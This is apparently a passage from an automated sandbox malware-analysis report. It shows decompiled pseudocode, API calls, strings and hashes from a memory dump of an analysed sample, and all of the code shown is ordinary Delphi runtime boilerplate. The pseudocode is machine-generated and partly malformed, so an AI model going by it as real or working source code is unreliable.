								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E032A21E0(8, E032A20C4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t214 = _t182 - 1;
							if(_t214 < 0) {
								_t141 = E032A21E0(7, _t140);
							} else {
								if(_t214 == 0) {
									_t141 = E032A21E0(6, _t140);
								} else {
									E032A363C( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E032A21E0(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E032A20C4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L38;
						}
					}
					L38:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L48:
					E032A21E0(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L49;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E032A21E0(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L44:
					L44:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E032A20C4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L48;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L44;
					}
				}
				L2:
				_t200 = _t200 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L2;
				} else {
					E032A3098( &_v112644, 0x1b800);
					E032A3098( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x32db70c; // 0x9200000
					goto L13;
				}
			}

0x032a2531
0x032a2533
0x032a2534
0x032a2534
0x00000000
0x032a260f
0x032a258f
0x032a2594
0x032a2596
0x032a2598
0x032a260c
0x032a260c
0x00000000
0x00000000
0x00000000
0x00000000
0x032a259a
0x032a259a
0x032a259f
0x032a25a1
0x032a25a7
0x032a25a9
0x032a25af
0x032a25bc
0x032a25c6
0x032a25ce
0x032a25d6
0x032a25db
0x032a25dd
0x032a25df
0x032a25f2
0x032a25f9
0x032a25f9
0x032a25f9
0x032a25f9
0x032a25dd
0x032a25b1
0x032a25b4
0x032a25b9
0x032a25af
0x032a2601
0x032a2606
0x032a2608
0x032a2608
0x00000000
0x032a259a
0x032a261b
0x032a265a
0x032a2628
0x032a262d
0x032a262f
0x032a2631
0x032a2638
0x032a2644
0x032a264a
0x032a2651
0x032a2651
0x032a2651
0x032a2651
0x032a2657
0x032a2657
0x032a2657
0x032a2675
0x032a28d3
0x032a28d9
0x032a28d9
0x032a267b
0x032a2684
0x032a269f
0x032a26a1
0x032a26ab
0x032a26bb
0x032a26c1
0x032a26cd
0x032a26d3
0x032a26da
0x032a26e5
0x032a26e7
0x032a26f8
0x032a2705
0x032a2718
0x032a271a
0x032a271a
0x032a2728
0x032a2779
0x032a277c
0x032a277d
0x032a2780
0x032a2780
0x032a272a
0x032a272a
0x032a272e
0x032a2740
0x032a2742
0x032a2745
0x032a2746
0x032a274a
0x032a276e
0x032a2770
0x032a2770
0x032a2783
0x032a2786
0x032a279d
0x032a2788
0x032a2788
0x032a27b2
0x032a278a
0x032a27bf
0x032a27d8
0x032a27d8
0x032a2788
0x032a27da
0x032a27dd
0x032a27de
0x032a27e2
0x032a27ef
0x032a27ef
0x032a27f1
0x032a27f2
0x032a27f8
0x00000000
0x00000000
0x00000000
0x00000000
0x032a27f8
0x032a27fe
0x032a2804
0x032a280a
0x032a2814
0x032a281b
0x032a281b
0x032a281b
0x032a282e
0x032a28aa
0x032a28b6
0x032a28ce
0x00000000
0x032a28ce
0x032a2837
0x032a2839
0x032a283c
0x032a283d
0x032a2840
0x032a2841
0x032a2844
0x032a2845
0x032a2848
0x032a2848
0x032a285a
0x032a2862
0x032a2865
0x032a2867
0x032a2868
0x032a2872
0x00000000
0x032a2878
0x032a287f
0x032a2881
0x032a2884
0x032a2885
0x032a2888
0x032a2888
0x032a2892
0x032a289c
0x00000000
0x00000000
0x032a289e
0x032a28a4
0x032a28a7
0x032a28a8
0x00000000
0x00000000
0x032a28a8
0x032a2539
0x032a2539
0x032a253f
0x032a2540
0x032a2541
0x00000000
0x032a2543
0x032a255c
0x032a256e
0x032a2573
0x032a2575
0x032a257b
0x032a2582
0x00000000
0x032a2582

Strings

Unexpected Memory Leak, xrefs: 032A28C0
7, xrefs: 032A26A1
, xrefs: 032A2814
The unexpected small block leaks are:, xrefs: 032A2707
The sizes of unexpected leaked medium and large blocks are: , xrefs: 032A2849
An unexpected memory leak has occurred. , xrefs: 032A2690
bytes: , xrefs: 032A275D

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 35528fd03b4b8bf39433670318710af0638e0adce11af7dbf30a544be0a84f73
Instruction ID: 1a28bf6d6384e3b891f1f0199db5fddce508ea458ff4a67259b3d77d48828f0f
Opcode Fuzzy Hash: 35528fd03b4b8bf39433670318710af0638e0adce11af7dbf30a544be0a84f73
Instruction Fuzzy Hash: DE71D534A24798CFDB21DA2CCC84BD8BAF4EB09700F1448E5E549DB282DBB58AC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 032D17D4 Relevance: 12.9, Strings: 10, Instructions: 365COMMON

Download Yara Rule

Strings

+, xrefs: 032D1867
A, xrefs: 032D1BB3
N, xrefs: 032D1B37
9, xrefs: 032D18E4
N, xrefs: 032D1BD2
F, xrefs: 032D1B4E
-, xrefs: 032D1872
0, xrefs: 032D18DB
I, xrefs: 032D18A1
N, xrefs: 032D18AA

Memory Dump Source

Source File: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID: +$-$0$9$A$F$I$N$N$N
API String ID: 0-1648577461
Opcode ID: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
Instruction ID: a1d9158f2c30d73ba6cbb5c6a3c3b4d83e52bc9b6626574acbc4ef87c1a8108c
Opcode Fuzzy Hash: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
Instruction Fuzzy Hash: 63E1D275D2424ADBDF60CFA8D5842EDFBF1EF08300F24816AD815A7691D375AAE0CB91

Uniqueness

Uniqueness Score: -1.00%

Function 032D1CB8 Relevance: 12.9, Strings: 10, Instructions: 363COMMON

Download Yara Rule

Strings

F, xrefs: 032D202F
+, xrefs: 032D1D48
0, xrefs: 032D1DBC
N, xrefs: 032D1D8B
I, xrefs: 032D1D82
N, xrefs: 032D2018
N, xrefs: 032D20B3
9, xrefs: 032D1DC5
A, xrefs: 032D2094
-, xrefs: 032D1D53

Memory Dump Source

Source File: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID: +$-$0$9$A$F$I$N$N$N
API String ID: 0-1648577461
Opcode ID: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
Instruction ID: 451c0bc605870e5b8ee5066a206b7715e9dfb483042813c69a6f9a072bc1ab51
Opcode Fuzzy Hash: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
Instruction Fuzzy Hash: 6FE1B074D2434ADFCF60CFA8D5846EDFBB1EF09300F24816AD804A7652D371AAA1CB95

Uniqueness

Uniqueness Score: -1.00%

Function 032ABDA4 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E032ABDA4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x32ac06f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E032ABCE0();
				E032AA85C(__ebx, __edi, __esi);
				_t196 =  *0x32dd8d8;
				if( *0x32dd8d8 != 0) {
					E032AAA34(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E032AA7A8(_t43, 0, 0x14,  &_v20);
				E032A44F4(0x32dd80c, _v20);
				E032AA7A8(_t43, 0x32ac084, 0x1b,  &_v24);
				 *0x32dd810 = E032A7AEC(0x32ac084, 0, _t196);
				E032AA7A8(_t132, 0x32ac084, 0x1c,  &_v28);
				 *0x32dd811 = E032A7AEC(0x32ac084, 0, _t196);
				 *0x32dd812 = E032AA7F4(_t132, 0x2c, 0xf);
				 *0x32dd813 = E032AA7F4(_t132, 0x2e, 0xe);
				E032AA7A8(_t132, 0x32ac084, 0x19,  &_v32);
				 *0x32dd814 = E032A7AEC(0x32ac084, 0, _t196);
				 *0x32dd815 = E032AA7F4(_t132, 0x2f, 0x1d);
				E032AA7A8(_t132, "m/d/yy", 0x1f,  &_v40);
				E032AAAE4(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E032A44F4(0x32dd818, _v36);
				E032AA7A8(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E032AAAE4(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E032A44F4(0x32dd81c, _v44);
				 *0x32dd820 = E032AA7F4(_t132, 0x3a, 0x1e);
				E032AA7A8(_t132, 0x32ac0b8, 0x28,  &_v52);
				E032A44F4(0x32dd824, _v52);
				E032AA7A8(_t132, 0x32ac0c4, 0x29,  &_v56);
				E032A44F4(0x32dd828, _v56);
				E032A44A0( &_v12);
				E032A44A0( &_v16);
				E032AA7A8(_t132, 0x32ac084, 0x25,  &_v60);
				_t104 = E032A7AEC(0x32ac084, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E032A4538( &_v8, 0x32ac0dc);
				} else {
					E032A4538( &_v8, 0x32ac0d0);
				}
				E032AA7A8(_t132, 0x32ac084, 0x23,  &_v64);
				_t111 = E032A7AEC(0x32ac084, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E032AA7A8(_t132, 0x32ac084, 0x1005,  &_v68);
					if(E032A7AEC(0x32ac084, 0, _t198) != 0) {
						E032A4538( &_v12, 0x32ac0f8);
					} else {
						E032A4538( &_v16, 0x32ac0e8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E032A4824();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E032A4824();
				 *0x32dd8da = E032AA7F4(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E032AC076);
				return E032A44C4( &_v68, 0x10);
			}

0x032abda4
0x032abda4
0x032abda5
0x032abda7
0x032abdac
0x032abdac
0x032abdae
0x032abdb0
0x032abdb0
0x032abdb3
0x032abdb6
0x032abdb7
0x032abdbc
0x032abdbf
0x032abdc2
0x032abdc7
0x032abdcc
0x032abdd3
0x032abdd5
0x032abdd5
0x032abddf
0x032abdee
0x032abdfb
0x032abe10
0x032abe1f
0x032abe34
0x032abe43
0x032abe56
0x032abe69
0x032abe7e
0x032abe8d
0x032abea0
0x032abeb5
0x032abec0
0x032abecd
0x032abee2
0x032abeed
0x032abefa
0x032abf0d
0x032abf22
0x032abf2f
0x032abf44
0x032abf51
0x032abf59
0x032abf61
0x032abf76
0x032abf80
0x032abf85
0x032abf87
0x032abfa0
0x032abf89
0x032abf91
0x032abf91
0x032abfb5
0x032abfbf
0x032abfc4
0x032abfc6
0x032abfd8
0x032abfe9
0x032ac002
0x032abfeb
0x032abff3
0x032abff3
0x032abfe9
0x032ac007
0x032ac00a
0x032ac00d
0x032ac012
0x032ac01f
0x032ac024
0x032ac027
0x032ac02a
0x032ac02f
0x032ac03c
0x032ac04f
0x032ac056
0x032ac059
0x032ac05c
0x032ac06e

APIs

GetThreadLocale.KERNEL32(00000000,032AC06F,?,?,00000000,00000000), ref: 032ABDDA

Part of subcall function 032AA7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032AA7C6

Strings

:mm:ss, xrefs: 032AC02A
m/d/yy, xrefs: 032ABEA9
AMPM , xrefs: 032ABFFD
mmmm d, yyyy, xrefs: 032ABED6
:mm, xrefs: 032AC00D
AMPM, xrefs: 032ABFEE

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: caf7721e34f3b2168c0b799862b39c4535747ae5bb28d63da58157b542d1c927
Instruction ID: 947b50677024003c4f096bcdae50b2622e5e1a67d26a9c6859d341e5bad762b5
Opcode Fuzzy Hash: caf7721e34f3b2168c0b799862b39c4535747ae5bb28d63da58157b542d1c927
Instruction Fuzzy Hash: 5E611038B20A589BDB05FBBCEC5069F77B99F88300F509475A101EF345CAB9D986D750

Uniqueness

Uniqueness Score: -1.00%

Function 032A4320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E032A4320(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x32db04c == 0) {
					if( *0x32c9030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x32db220 == 0xd7b2 &&  *0x32db228 > 0) {
						 *0x32db238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E032A43A8, 2,  &_v4, 0);
				}
			}

0x032a4328
0x032a4388
0x032a4398
0x032a4398
0x032a439e
0x032a432a
0x032a4333
0x032a4343
0x032a4343
0x032a435f
0x032a4380
0x032a4380

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032A43E7,?,?,032DD7C8,?,?,032C97A8,032A6575,032C8305), ref: 032A4359
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032A43E7,?,?,032DD7C8,?,?,032C97A8,032A6575,032C8305), ref: 032A435F
GetStdHandle.KERNEL32(000000F5,032A43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032A43E7,?,?,032DD7C8), ref: 032A4374
WriteFile.KERNEL32(00000000,000000F5,032A43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,032A43E7,?,?), ref: 032A437A
MessageBoxA.USER32 ref: 032A4398

Strings

Runtime error at 00000000, xrefs: 032A4352, 032A4391
Error, xrefs: 032A438C

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 1563ad53b88ab298629fa4197875ee810c85344c2b923e6845e42200e76e6559
Instruction ID: ddf9baa32dc56819305d213058b44dd8d1dd3fe74afc0826bc34040e715145ac
Opcode Fuzzy Hash: 1563ad53b88ab298629fa4197875ee810c85344c2b923e6845e42200e76e6559
Instruction Fuzzy Hash: 78F0BB65EB5744BBFA10F6A96C1DF5D261C5B40F21FA48309B220DD1C587F090D49761

Uniqueness

Uniqueness Score: -1.00%

Function 032AAEA8 Relevance: 10.6, APIs: 7, Instructions: 56
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032AAEA8(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E032AAD20(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x32da900; // 0x32db04c
				if( *_t14 == 0) {
					_t16 =  *0x32da7d4; // 0x32a687c
					_t9 = _t16 + 4; // 0xffea
					_t18 =  *0x32dd7f8; // 0x32a0000
					LoadStringA(E032A5874(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x32da7fc; // 0x32db21c
				E032A2D4C(E032A2FC4(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E032A8048( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x32aaf6c, 2,  &_v1092, 0);
			}

0x032aaeb7
0x032aaebc
0x032aaec4
0x032aaf2b
0x032aaf30
0x032aaf34
0x032aaf3f
0x00000000
0x032aaf55
0x032aaec6
0x032aaed0
0x032aaedf
0x032aaeef
0x032aaf02
0x00000000

APIs

Part of subcall function 032AAD20: VirtualQuery.KERNEL32(?,?,0000001C), ref: 032AAD3D
Part of subcall function 032AAD20: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 032AAD61
Part of subcall function 032AAD20: GetModuleFileNameA.KERNEL32(032A0000,?,00000105), ref: 032AAD7C
Part of subcall function 032AAD20: LoadStringA.USER32 ref: 032AAE12

CharToOemA.USER32 ref: 032AAEDF
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 032AAEFC
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 032AAF02
GetStdHandle.KERNEL32(000000F4,032AAF6C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 032AAF17
WriteFile.KERNEL32(00000000,000000F4,032AAF6C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 032AAF1D
LoadStringA.USER32 ref: 032AAF3F
MessageBoxA.USER32 ref: 032AAF55

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 2767aa460badff64f5665d34cb1ff291bdb434242cc8d5a21f4d031dcc684f93
Instruction ID: f3bcee1ce50bbf4e8f1b6f373cf7ab5eb359d6f844aa677606d0480bfd1bd54c
Opcode Fuzzy Hash: 2767aa460badff64f5665d34cb1ff291bdb434242cc8d5a21f4d031dcc684f93
Instruction Fuzzy Hash: C61148BA564B04ABD200FAA8DC85F9BB7ECAF44701F444915B254DA0E0DBB4E988C762

Uniqueness

Uniqueness Score: -1.00%

Function 032AE570 Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E032AE570(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E032AE014(0x80070057);
				}
				_t47 =  *_t91 & 0x0000ffff;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L032ACDD4();
					return E032AE014(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 = _t91[4];
					} else {
						_v792 =  *(_t91[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L032AD22C();
						_t113 = _t54;
						if(_t113 == 0) {
							E032ADD6C(_t100);
						}
						E032AE3C4(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E032AE4E4(_v788 - 1, _t115) != 0) {
								L032AD244();
								E032AE014(_v792);
								L032AD244();
								E032AE014( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E032AE514(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L032AD234();
							E032AE014(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L032AD23C();
							E032AE014(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}

0x032ae570
0x032ae57c
0x032ae582
0x032ae584
0x032ae58e
0x032ae595
0x032ae595
0x032ae59a
0x032ae5a8
0x032ae721
0x032ae728
0x032ae729
0x00000000
0x032ae5ae
0x032ae5b1
0x032ae5c3
0x032ae5b3
0x032ae5b8
0x032ae5b8
0x032ae5d2
0x032ae5de
0x032ae5e1
0x032ae64e
0x032ae654
0x032ae655
0x032ae65b
0x032ae65c
0x032ae65e
0x032ae663
0x032ae667
0x032ae669
0x032ae669
0x032ae674
0x032ae67f
0x032ae68a
0x032ae693
0x032ae696
0x032ae6b2
0x032ae6b9
0x032ae6c4
0x032ae6db
0x032ae6e0
0x032ae6f4
0x032ae6f9
0x032ae70c
0x032ae70c
0x032ae715
0x032ae698
0x032ae698
0x032ae699
0x032ae69f
0x032ae6a5
0x032ae6a7
0x032ae6a9
0x032ae6ac
0x032ae6af
0x032ae6af
0x032ae6b2
0x00000000
0x00000000
0x00000000
0x032ae6b2
0x032ae5e3
0x032ae5e3
0x032ae5e4
0x032ae5e6
0x032ae5ec
0x032ae5ee
0x032ae5fd
0x032ae5fe
0x032ae608
0x032ae609
0x032ae60e
0x032ae619
0x032ae61a
0x032ae624
0x032ae625
0x032ae62a
0x032ae645
0x032ae647
0x032ae648
0x032ae64b
0x032ae64b
0x00000000
0x032ae5ec
0x032ae5e1

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 032AE609
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 032AE625
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 032AE65E
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 032AE6DB
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 032AE6F4
VariantCopy.OLEAUT32(?,00000000), ref: 032AE729

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 64ad64c3195a2b266e732bc1d787a2588087a1c16bed5c34222ee16cb595d48a
Instruction ID: 7551ac4a74e291326709c33977459f314368f50115c7e94b50b2d147f6e44d0a
Opcode Fuzzy Hash: 64ad64c3195a2b266e732bc1d787a2588087a1c16bed5c34222ee16cb595d48a
Instruction Fuzzy Hash: D551DC79910A299BCB22DB5CCC90BD9B3BCAF49300F0545D5E609EB211D670AFC69F61

Uniqueness

Uniqueness Score: -1.00%

Function 032A355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E032A355C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x32c9024 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t14 =  *0x32c9024 & 0xffc0 | _v12 & 0x3f;
					 *0x32c9024 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E032A35CD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x32a35d4);
					return RegCloseKey(_v8);
				}
			}

0x032a355d
0x032a355f
0x032a3569
0x032a3585
0x032a35e7
0x032a35ea
0x032a35f3
0x032a3587
0x032a3589
0x032a358a
0x032a358f
0x032a3592
0x032a3595
0x032a35b1
0x032a35b8
0x032a35bb
0x032a35be
0x032a35cc
0x032a35cc

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032A357E
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,032A35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032A35B1
